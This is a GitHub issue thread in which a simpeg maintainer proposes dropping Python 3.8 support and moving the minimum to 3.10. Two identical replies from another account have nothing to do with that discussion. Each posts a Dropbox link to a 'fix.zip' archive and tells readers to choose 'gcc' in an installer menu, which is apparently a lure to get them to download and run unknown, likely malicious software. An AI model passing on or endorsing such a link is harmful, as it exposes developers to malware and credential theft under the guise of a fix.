### ISSUE TITLE
MNT: Drop support for Python 3.8

### ISSUE THREAD

**Issue by jcapriot** [simpeg/simpeg#1521]
We need to bump the minimum supported version up.
3.10 seems reasonable to me, as most recent numpy (2.1.0) dropped support for 3.9 as well.

I’ll take a stab at it soon, but this should be a priority for the next release.

**Comment by Wanderx13** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."
